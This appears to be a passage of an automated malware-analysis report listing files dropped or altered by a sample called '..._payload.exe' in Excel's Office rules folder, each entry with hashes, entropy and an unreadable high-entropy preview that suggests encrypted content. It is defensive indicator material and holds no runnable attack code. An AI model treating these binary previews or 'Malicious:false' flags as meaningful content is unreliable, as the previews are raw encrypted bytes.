                                                                                                                                                                      Preview:<?xmlD.oaL.......^.g.q7s..H...M'G....Y.;w...M....r..^..'..0PK._.NR@...lk...6.5..C..Pt..&%'%.v..p..2?. 9......|..n..{.$..G.u.VCS.f\d..i.....S.i..[..!.h.${..U..,..?.=O~;.N...........?D..B.t.....'.A!..K@.Z<=F.@.;*.&s.z..F....c..rm..n.|^...VS\U.....nAe....n....6.s.......S,...=t.......8.z......_-..j.l.soJ....M..I*.NO....Y3K..c w......q^...W/., .G..N.w`......_23=.. .4\v....{k...3.8.xoJ....#.}[)....[..?..}Fp.s.v9Y.u......x....m&.......I..OL.*.U./Z.5+v.d.~..-..m4.E1O...h.8~.Z..>..xQ/3.m`..`.N.....\.@,(T.%.:.._):!:S:..I..@.O6...??.oE...}+.%...v..qL.B._.[....d.....qu....kM6...7.U[t....7...#..6.}:...zQ....F.k..{_k...}.q...,7.mv..p.........g..,4k.K........lEq...&..h'+m.....kJ]/...*..<h.....[X....~.Y...*.,/.0i.._'d.{...^.....?....eX.|...].h.......+....t....[.D.z..M.x.......j......{.t.2B.+g...Y....2c6....wv..?[xsg%.b.u].S....B. ...=.......n.G....P....._......i/..Q|...W.G[...h.'..4.....T.N...c_'#=+.H....)ZW,c.....r.`..D.W..]%X.M.........]..|..#.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1197
                                                                                                                                                                      Entropy (8bit):7.8349111005931835
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:qc/sk6E/hXIt6jrLAxlbDxluvFOJ+MVG55pScIOoApoYXsaaCJmVGCnPAWQ2bD:qc0kXh4GnAfDvuaVG5UwpoYhaCJoGk4w
                                                                                                                                                                      MD5:48BDF8FCFE6E77B40AC1147B939DE7CD
                                                                                                                                                                      SHA1:794A2F056A3E37FB53AB56F3BDBC94F8E0007F69
                                                                                                                                                                      SHA-256:E49463C8522F2ECA9E33D650E77B7821C4BA45A60D95B8A68F8BE2672B43A426
                                                                                                                                                                      SHA-512:B44698D3F259A704E1A1787529A05794E9329ED47857F2901524204421B6981BF026F24A3CD15677B713F32B5ABFD1EB1ED9EDE98F060BA6F395CB11AAE59015
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..v...............@q.."#..&._..sz..h$......LXpu|G.v.O#J......Q.......;c..[.2.gF..+..+.3..."....2..f.W?B..... .......2QE.".?..r....1'..,..=.~......hR.o^..@.6..U...B...vh..p*...1...$!...........n.N....z.s.....pz.ho......&Y.sND.+._.j..*....C......M/.~..4.....%b...6..I....\_.H.t{..(1i.Hm..CHO.......\.._.1.<...O.D.6psrh.....!....}x[.i....Lhh.......f.}.#..4.sG.....*,..F.B.n.FjM..Q....eX..4....(......}..ULb..1q....=y.t/...y)....d....R..EO.#.-.]....G)........2GR......X%..^..g....Tu.O..V.(I+.%..C.@d..t...P..m....M...m.K...:DT....}GF&....v?+....w..... 4n.s.e.8...J.y..R...;......,..d./..e..q.aA.q...,........*:...F.U.Wz..a..Y8..>.T.`g.^..r....../....X+.Hp.............$.E......VR(.*.|.....Y...Z...g..F......V].(xz...v...@.q.....'..!..m.'..q...!.\S.....w_.|Ju.m(.....!...k...._.hO..[.W.J.qb..[.f.D...B..B...E...O.........}.... ....f')C.!f.hM..>_...k.M.50..mR....f...o..I.%%.C.>.F....o..hM.....O6g..h\?MU .......z`t......<u.r..p......L.x.c.:.'....K..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1197
                                                                                                                                                                      Entropy (8bit):7.8265549329804225
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:DcVzfSpcRv3HoynK51DUBb3UoT+eSvkzjZsZr22bD:DcFmcvDgUlT/Sv8jZWr9D
                                                                                                                                                                      MD5:4D5B6C30AADAB987C9B6B4C9219A5DD4
                                                                                                                                                                      SHA1:119EEEA1BBE735685583472372C8FC3F392B747E
                                                                                                                                                                      SHA-256:6029FF1AF1CAB9002FAF0DD5ACA1D90A58E59AC818E8739F28666BD6E6F34956
                                                                                                                                                                      SHA-512:DE34B42744B469E11D2C807CAA5520F286BB0D85CB8D6AC62A21BD1111B9C4F45A46EDE43B2D1529EE5709BFA53008734930FC105237F2696E8521437BA8010F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..i).3-....p\`.5..~.y.~.o...t..j7...7............T.^...|.UB.. .[.zi..%G....*>.'Q....W).....|.......kf.X.G.{"../.....@..'f..I...pG.P.r0....~..x$._.d.....4-^....G.u.V...y..X\.....3<?kc5I.3<.]...i. .]..$.......l.V...[ .v.OlsC..i.y.......#..S..j0g.~gt.b.o.3..!.@=...cn....d...^)0.c....s+...3L..$....[.VfD.e....b?.b.....x.e....n.d.T9.-n....5;.].*.H^.jR..R(i..!..1..w.qT,..p.=.{....9.RsX"..!h...!....$k..F\-l.-m.2.....%....ku`.OSEN...%c.Y..p.\.G.rr).t.yv..7e...i..Kg}5..U..9t.K8I...?&+!'.<....uE......U.{$n......M......2..6"~,..oG.S......%....E.;Q0.R$.I..Y..b.}.U.8...=`C....[....t..N..........(.C.>H....mYo...F :5...-..$..,&.jTyh.O.J.K....%..s....P.i.A%3M..:7$...+-x..l0....YV...Q.C`].........N.&b..y....`..<..(......='.l:...I]....Y..P.},..d..h.!V.q{v.2..?.]...[h..U.r.....Pl.......".n.l.......`jg`.\8......u{b...`...rr.EU{.S2V...).T.-.....uJ....m.|.D#...'.V ..x...l.|.q..X..7_....bZ}....` .......b.-...Z..!..k._p..<)..F...e..$EI..$......J....f~g.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                      Entropy (8bit):7.794719413546463
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ZOGH33Kf6hQ57VGq4vxhHegOsO1MZSYs6GS7kWf2bD:cGH33o6hQxVGFKgNOCZ46F7kZD
                                                                                                                                                                      MD5:878D110EFEE70BD10798399161DCF2D3
                                                                                                                                                                      SHA1:D8973069B80EBF7E7E10A4A1550D340F4D3A3A4B
                                                                                                                                                                      SHA-256:D102036C706DB525DE2CC64EEA801BD0180E77FCA8868907945291B51F97E8D8
                                                                                                                                                                      SHA-512:5D3CE3EB911ECFA74C3E924F8F0FBCD29BA3FCA7C53FAE3AC3CE69739C9117187B25F91040DC47BC47F14798E53F6BF9A01922A97307F15CA9C08BBAE720B50E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....]NQU.wM.....e?...... ....eF..~w..b...}9...o.8^........#p..y..........\K....4k..)...@;.L...8...g...R).1.?.....%........o.D...[f9.S.."..(.M......>P..&)..uP.\.3..1i.p.Z...".0Q$....wx...'.2...k.>..l-d...F.l.E.[."../.[}I.....A%..'......R....!....,......}.....=(...Z1...n...^a.E..D......-........Z!.X.Ry`3).0...FfV...P...nrz..Iw.....7N-M.A..Z.P.uX.5W..nZaK.....<.".x..t.5..........]..{.....>L..[...| ..]{in.......{......3.a]y."S.V.M.z7...y0.U:.......8.3.!...,(...!.CQ.. %.....N..G....*:......I>8N<bu<.42V..^...#89...$....<.q...R..b.2......o.*.....Ky.6.v. g3.)#l...).K.C+.._n:1!.K<D.g..UL.9...]....[..4T...H...v.FMcr...Q.c[..<[]TIGy......h.|.y...(=o..(..V..Y..d.......QJJF.{O49....yh4V.8X..Nu....ee...o.T..0.....[q..."d.b.. T.....C..a......'E....PD.gx.go...(yB.....D<{..{B..#m[b....'T..3... ......P.7...O..v..%m.h*q....*..I.a..'c..as.X3k#....fI....'.5..g:...c..1*..s.....$.kM<...XO.Z....m.....H.|..3.sr@o.|n........4c3.cN...`.....=B<..~.a.@"

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                      Entropy (8bit):7.78674043544497
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8Z11cyS2cYeyNQEx5eqiy5xKR/yyP1CsA885p3yyYuf7kfpVqu2bD:8+L2cDy/xCy5xqnUYGkfpAVD
                                                                                                                                                                      MD5:C35E3CA2FA33AA66FB7A3A3C3F0EE1A7
                                                                                                                                                                      SHA1:234E25978B5E301B3E73D179F57170E07EB8BFC4
                                                                                                                                                                      SHA-256:8BA7C407E66EA9E8DE0D3042BCF45D4DA6E43D6FC067D4D1AB535A0140448B8A
                                                                                                                                                                      SHA-512:27F049703660F84043317D44FADD412C1B9494CD0A93DEBD3EBB971E9A0203118248B409B4C52CB147CC9702415969ADDD4646CF92FF240E124D3C5B1B4273DD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml<...aa....u..P.@...;AE..p/..A...e...TP..%6...|=....Y!..ZQ:'.F.....M.x.X.w...q.......K'.mq..4.`.*...YZ.C...xo..../.,..4J.d.]t.4;.!....~.,.8.B..|....:..8.hjG."..IAS..f..........u8.<vL..{.sg..8.*>9L.-...qh|.Q.hs.....-G.<.Rl.|.&.C...v&H.n..PU......O..=P...JT\N$m.h.Vo{....1.Y.p...A..sU...."...%.....e..I.FJ.H48R.\....w..J....#]..O.u.c...N"...L.......).z/.,.."V...f.>.....H.@.NYI.L..q.QR.p.xP..h.l...C.?.._.....r....ao6..L...!.Pa[.p+.......^..p.c...e`.:.@.W%SV.....gnq.V..I.e=.`8N7h.H.....w..v\2.).o...=.0,...Bp...w5..m0.3a.d....il6.z.Q.T@K.G..K........0kp...D.]..].8.(.3..Z.i../..lJ..x=..'._O7.*..'F.E.=0G..(......l.`.......NQ..;'.B...4sq.....2Q.N.......PLy=3`...5\\...h.......J..T..lB.GT.h}g._.`....K.....El.....@a..|.x!1.DY.Fq...n.'.vl.U\6}.T....K_.....F.t..=.|=v.p=C|.F..JE...6v....z...;...&..........n.H...............t..]...f*.c.......0.v.1.....kT;H...)....d.O.W..5......"p.x..,..E........?..vr..p..@.X...n...q.|.I.KPGs..B.x...qQ........B!...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                      Entropy (8bit):7.823438718639526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:DLhrUa+YFtw6mxOPsQS8cw2PE/9AVaDkZ89BV01CcViagu6XzZ+2bD:DLmRokQS+X+MZubv6DHD
                                                                                                                                                                      MD5:EF3E2F0A05EDCF58C8269280354F5291
                                                                                                                                                                      SHA1:753D4A9A78B79CCB2D9AFAE55F77B1596191B94B
                                                                                                                                                                      SHA-256:D243BA50A9495B2EAE40D654CA08E70CE4D44EE5BBD82330EBB354A3D4219AE4
                                                                                                                                                                      SHA-512:B7AF44F14E37D7835D3093556B9AC54D7E23F1B8500D3F851D6FC476BC770A39113FD0532D3C9EAD102711E2381341C2B5A952E08AFBB2BC87ED1278DFE6BD09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlrE|..]...|..<e.(l.Jy.lM.)......|........".....21.?.pi..[x.....[T*.0+}}..9.....P......u%.>2...?.I...,..=...]..kx.B<Q.Z..3.8.....q.$....ym..2/&5..,........l.!.1..Jh...c....x..I...1....vDE\.g.M.....09....j.qJ..c .`.j._.m.3....y d....-C....tch..5.R.x[Sc._.P........9.._HuX.....-.....s.:.wthU.....C^.H. ..-$.]L......6....;.H.....2l.]...|.J..G....f....0...i....o(...u......s...:i.}...]:!.W...v....a..!...... .&S...T4..e.....R...._..j..[j.Ue...u~...c...1a4}J........=..9zA6.F....mK.LT....-zKG@..1........U/.a....rY....R.QP....}.5.,j..UB~h...;n. ....|..<e?.r.Wl.r..kd..S.c.P-..}.Y,>..X..h...B2.mfM....*qJ......v.i.>....I......N]gS...ao3...2.>.N^.1S.....>d..&...&....f.....q5.......`.J...;*...}.7...t.....S...;.3.2.I?t.x.......2'.W>.....{Y@2...h Q.A|...t.Cr..l.zz....r...L%x[.m..C..r...B.d^3.,...%..Dt."...U.)... W.7O.Nd-C..C...B.........:.L......0s....!{.$D".5....Ks..jC/.........e.7.9.....D.X..ouW........_C..F...u..=I.....".*C,.....mv9.. .K~....IP.y....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324004v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1073
                                                                                                                                                                      Entropy (8bit):7.77613510553694
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:eJTF1kJNTftPuBmvPxviTc3ctq4Ji/mp4Z4nJ5n2bD:eJ8rTwBKpaT62qCAm+4noD
                                                                                                                                                                      MD5:AB085952ED521A5501CDFC0671DE850F
                                                                                                                                                                      SHA1:9605269034DC4517D37DCD74DE863B9CA276445F
                                                                                                                                                                      SHA-256:86E00F651BC9310B9B79026B03EF8ED8F4BFC9352F74FB246763E320F66E00DA
                                                                                                                                                                      SHA-512:B584856C424CE06B332DA81725BAD815B46BBA5EA5B999E8D4AC9CB99C59EB4BC6ED8841F45815A9BC5EEF0728D4784092B2D6A7083AD7D858C9BEF731939209
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...~...W.q...3UB.....4.xKi.u..)..CD..k.@>.r7...f.k.u...@gt8.J.R..>D4.LA.T..%H.^..rv).!.....9.q.R....W.u/.... S.!b =...e.....@}.)pT[.w..\.....e...`Fv....p..)J..^....h..=.4A.......'....v.0...].s.....?H..^..2.P.3.D..^.?.5.g....l.e.R|....G.....PJ..\.o...........B..:...zn.Z...~V.3b,...e0-.....'........mj.(W.&x|..4.|._......i..x........v.Izp....v>..^.<.P!.L..v.<-...;.#.Oo}...8.TzUJ.......c....N......GD9..0....)..K.2T...f.....|yj.?N..b...^.-.).O..&.EG..9.."..:4F.S...X..\..hw....vGJ..u.....rc.%cz.4/L......2)....k.Y........ u....x.....{.9.Xbq0.T.6..m.=......S.e...W...V..#...AH...#.\.5Y.q....N.V.^...^....>....@t".q.Z.`...j.D..8.U.....R.*..ie.......M..R.g12tyr..C....#..[..Z.".P..../E.v6m.G.Swv%I.+.f..Hj.U..u....2....v.j.R.c.o..|...1.IE.K...w.C..WD.pL..z..F:uXn.!-+D7t4D.k..#mM...f./.P./$v..)Ak...Op..J2..<.L..2C..{:.sk...c..~.,...c..U..b..*.5HK..H...Z.P.....t2.RV.....+.,.....0..(..!. ...^,.].J.b.>B......q.$A........4.g..\t.^,l$.uS.:.'*....~.....BXmMsRx

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324005v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):933
                                                                                                                                                                      Entropy (8bit):7.791253235671743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GyagS1oM6s0bFIvZpRJGVo3atrJg7OmjTtUoSDqo2bD:Gya1o60KTR4Vo3atVyOEphGqbD
                                                                                                                                                                      MD5:D012DE982ACD7CF764E9C37B63B21893
                                                                                                                                                                      SHA1:4C34CB6092AED48DA17FCCA5DCB5A0E1B444764E
                                                                                                                                                                      SHA-256:123DB70A0B95E9EE9FB9097CCE4C96551F43B7D6AEA921F60BC897D29F28EC68
                                                                                                                                                                      SHA-512:7FA275C4B0633AA8AA6C2D53DC86C478FD0808FDD0D897964FDE42EF31008130D99E1D82845CA64B03373C880754CC1887DF7035674D0A3977769F2A0D5EDCD9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.?$&..o".#E5!.UF7....x...q."....}.......c. ..rLSX.[i.|......:...o.\.& '.....X|..u..._6..6(..7.......L....... ...t.y!.>....*e.".Gn..bZ..V&.....).Y..".,....e.U..<MK...t&.2./.PN..-c..^......2...(.[..&.!+_=..A{D..J..|..q.X..# d.+...u.\.:S.9.w.W]d...u.L...vf.&...e..Z....#..}.P..A.u......^,...<...+o....=..x4..)^2....DIBbI.'..Iv2.}....%......8.@p.:9.....#dg|Fh..6{.Y_k..,6.....|P...7Iz?...a....<.u0.-b.....#...q.@..6..9Z.. .. .f@.Ji..2/y...#.L.ZA`.....6...v...-....F..a..D..K..cR.m..N5.........l:).@..d..B5..>.C...)...7..so.M.0.;...9z..74..0.....l.c...,.W.)..8..fG...H.d.t2~hP.........5^Q/......r(tW....R.@....#.?..;fn..#...I....;.|....nP.SD.../8....~..E...'.z.<g.-..>.. ...=....1.;M.@hW*D.>....{....c$$..8.....G....A&.sVq.X.9p=.........T...8L.Z.N.s[....`..\.U"..j.....n....6.F*...{... .V66B.M)..z.u....IV..J..< .K......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324006v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):933
                                                                                                                                                                      Entropy (8bit):7.816714088543587
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:F4wSknq0INLFp8yYPay35E/OVwl/uHEZ97V2bD:FAWINUE5/+EzSD
                                                                                                                                                                      MD5:E931FAFBBC3F791FE87ACDF44CF58A7E
                                                                                                                                                                      SHA1:F9126274329E6CEB626EEC1B1D9392CFD2822615
                                                                                                                                                                      SHA-256:4FB1633391895DDC48E46BDE23A6D4116E5D9A2F1761181B96BDA898E164E8FE
                                                                                                                                                                      SHA-512:10E9B13DBF0265A5FFC83B37CCB98DC5718885620B5999E43BBBBCF2D1F805847DBA7933D9FE6520835BFFFDC199B07420EB9E541CD96E068CA16E2BDFCE7D26
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.6CL.`..e.ZN..@kR._..RH.z..L.{..3...aY..p.....G..`.]..B.....`....0...j}...J2....o@`......K..8..n..^/..25J7P0;.dG......s....lT...;.e.k.8....j.T...P79-q+S....g....n..Z.D.1l...|..~.a..........U<..=.>...7$/.^............6.........oo_U... tD..)?`.5...@.58..K.H...,....X.`.........*8.u...._.v...*b.%.w[5|H...|d.y....b.8...8....jA..|........7..RS=#.%..#{#..].:DT.._.).kq..-..ic.K.*...x...Q@&.i4.KN.Ldre8.....a..4.V......]S....M.,....m=....r....g.agX%..[...].HJ..j......n..\..X..i.....s.M_X..b.i...!. ?........y@...f4..J..=..7.hY..$...<..y.].dV(......:.... .yF.bjm.)y..3..0U(..4..M.......\m&.n...........:.Eltd..h.^...+W.._v..V ..+......hN o.!g...!.id'...@.<..T..A.p@.R...A-w.q..VZ.....nd.$QYQ......=........9.Q....N^_...M.9G..on.g}v..........0.R..qu...<.~....h....e>.....)..1..J...Z.qK..E.y. ..:........c.7.~yY.:..Y.C.JmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324007v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):945
                                                                                                                                                                      Entropy (8bit):7.784012209521986
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zamQXU4q1RNU0UGVOIYlStt8t8pI5M2bD:xQER1nUuVhYlyyX5fD
                                                                                                                                                                      MD5:D1D43685CB94DF86055591DBD17E98E2
                                                                                                                                                                      SHA1:F4A517557981125338417A32E458CFD807F8B3FC
                                                                                                                                                                      SHA-256:345301A07A7F12D8C8D7820695E42C9C6869F896EB01E7842D29A5D12345C465
                                                                                                                                                                      SHA-512:BD457054772FBB6D26CB344179C073E19273CEC76301257F6F815964401C3E559C2554A2AA079C42648DD3C2182CACBA5D29B52F9F3DD7D027F160917824FC47
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...!..o.9^.s..d^IsYK(..H.8...M..0...9.Y..7&=q...a4]K.p.k...c...&.aO.........p-...L..!|..9..& .."...a.6...VI...)>...!...y.5.|.w...w5m.I{..[pi../EB....K....3.'..K...;..7..nUT...}...R...F....T#.1.W...0+l.......$..........sH.r.e.u.7rPW.].*$Q.r...{...h^.)...6..t....>.F.VoG.......0.........T).{v.....|g<..........aN....oT'.?!....8Z$E4.]N...z...-..*=......17s.._.S......~%F......./.N.1X.......Na...rlG..{.-Sh...+....Iq...''.r.0Rf...bS%.@c..J...6..N.....Z..|S.`X....{.`...6..K..ToD...8U/...Z!$B...HaX..N.yVQf..p...C?..2.s.j.i....S.*.7...o."......^...ZM...c..,......u.n#.Z.....B.L....uH..q......7..rKA6...z.D.@...>`ms*.{T.......[R.....}.....0....'......R......b.|UY..<....f.0...K...i.i...a.....JN..*.|.1...!].v.L.........4j=.!w..7.W..B......v.*..U5,.n2J<. Y...D.....g....-.IL..,[..E..G.....#.Ewn<d.p*.)._..>.7>..34ny#...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324008v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):941
                                                                                                                                                                      Entropy (8bit):7.7861490565173455
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:4458GZ9zbGB1hRJ6kcTImsUH8Ae4y7fgKFQWLAbw8fClxz5lQbv3oPoUxtoBSwHo:p92/wBcmZhY46QLc9Sgfmy4hDh2bD
                                                                                                                                                                      MD5:F23F89CF9D2049AAB2C3CB6A5E0DFFA7
                                                                                                                                                                      SHA1:3B1C4E6EF95FEEBF63514F7A2B3F1CF3FBF7729E
                                                                                                                                                                      SHA-256:A9E62696D011B5A8C3D3566CB534C85AA8BBFC24D0AC7945270D680C7F46A96F
                                                                                                                                                                      SHA-512:9357F06A03D8B320B6AFAE46CB78034AE4283DBAF977439882D3A63DB00E3FEA1CC838B9FD37C0BBEA283E762CF80628A62348F199B76F81E6632F5F5FA8306B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...}... ..P..:...bV&....B....$.d.$..o.1.!......Z.[v.......Y".Z.fla......B...9.ZJ..d..~)..e....E.......1..J.}*n.....J.L.O2]..!......Q...@.;q?...s..Y!..Ch_NR.U.r#.lZP.`.....p....E.)h..9.Q..o....q..61A4...2.&$.u.....#...S...2) .......sJ..J$..]9..{;..R.|...XG..9,n.......h..{kLwu@...}..30.Bt...m}e`........P.=.....~\4[z...#R[....u...By..@.Hm.._H..n`S..y...Fz.,i...l....W.....Q.F.....p.??..xf...........c.........'r.X2.E..s....R..:.f.....%.i>!....9|?.]..?...w.7.p....Ug`...C-.. =.#+>.ccf.q.k.8;.(Y.9...:.V.-.D.".S.;....&..0Ju..d../l.?"'...b.A..X..d..\.H...>...$s..........(.....f..8.....Tz.h...*......hF.rw.j/f.}.....3.u.c7..k..Y..b*.e...yE)..mVa`]04.?i..c/........IS.p...N..i...9.?1!a..L.g.I.<F..W.Z..gK...T.gXm[Y..R.).....3F.)........... .....;..y...FJ...B..=.;....^..Tgz....ki.X..c.........O..t...yD.....Xf_....!.u..k..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324009v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):945
                                                                                                                                                                      Entropy (8bit):7.748186583671273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:tUCd2I+KunrUGowWAmgtlQAAPuQLpCVmlZ+U2bD:tUCdVunVowWAmgtlQAguQoV0ZcD
                                                                                                                                                                      MD5:73780C96215A3BA7EC54910B09570301
                                                                                                                                                                      SHA1:01EADBFFA74B035E977CF446DD3D33BFEE9C9C6F
                                                                                                                                                                      SHA-256:F6099014AFD2045CF72330077ABA803ABEEAA7AFA7D0917A7E5C4A2648070EBF
                                                                                                                                                                      SHA-512:15871F65621674D7E1C0447263F96EE010379404F64ADA5032D344B5DE689550D24AAED0C9CF47733E5D79B6EA09997C7365E99C6F13596028637224114749A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmln.(.5.[.GZ.r..{.sQ..2/..+...q.S....... O.j1Ln.p..j.....~`_...E.>.%2..s....p8?..1.mnV.....%...Z./....&.1. .j..>,s~.....D.?)Cf........Y.9(..u.V.Y.c.E~..o..:c/...%*Gw.ER..c..^..Q..E Y..*...E.|.-.......}K.@,l.;.Q-....6T..1..\..~'...U...o4..4...*.s.....m.9&.{gG.....-.g..x.`....}c......m.l./O...l...[ ...b.x...N;ON....-U...N....9..G@.XgY.^..v........%...<-8.s.F..-...;A.}];..m;`..z..;.D....z.H.....~...l.......7...#.~..e{9.V3...*..pi%...E.4.f_.}.....[......6:....h.>%$2:3....2s.....s|F,.`..:...B..V....)..y..|,Jr.H....O..wq%..@...A.4.+..<..T....x..t.....x..3x.....Sh......d<....R.4.......GB .W..u.....n}.z.|......PY.....U..Z..?J..V[.y...Y.%....J.C..xpI.9(...`..u5....W.yd..=f..t:v.i.e..3.Z...t..:.q.F......XWV-|.*1..oY. ..........Y'.@...-.N..$..:....'....}..P..Ps....4%s. .......*M...'".E".....S.Y.@.I.V.U..u.coK!9mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324010v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):945
                                                                                                                                                                      Entropy (8bit):7.761628451553458
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ohBfsa+msEPN5b9kPLXnGfoDEDBAFjRdgi8S2bD:ojfd+zS5sXnpk2F7gfpD
                                                                                                                                                                      MD5:E1DFD1C83EDB17CD06560F848DA8295F
                                                                                                                                                                      SHA1:C94E3D60A059DB6C562AC51BD3E68E3F7A725FC2
                                                                                                                                                                      SHA-256:DE4FD3EE06BA5A8F708924F5FD635B388EA278228161B93BB1E32143276DBACB
                                                                                                                                                                      SHA-512:7AD08C78EF317EBD4B6B7BF9A3B49BCA0784C226D0B3F55BEA6C52257305FFDC484ED3422CC1D69043924D290E90FF1AC81F87CD2A83AE8B1AE6857F80A5A36B
                                                                                                                                                                      Malicious:false
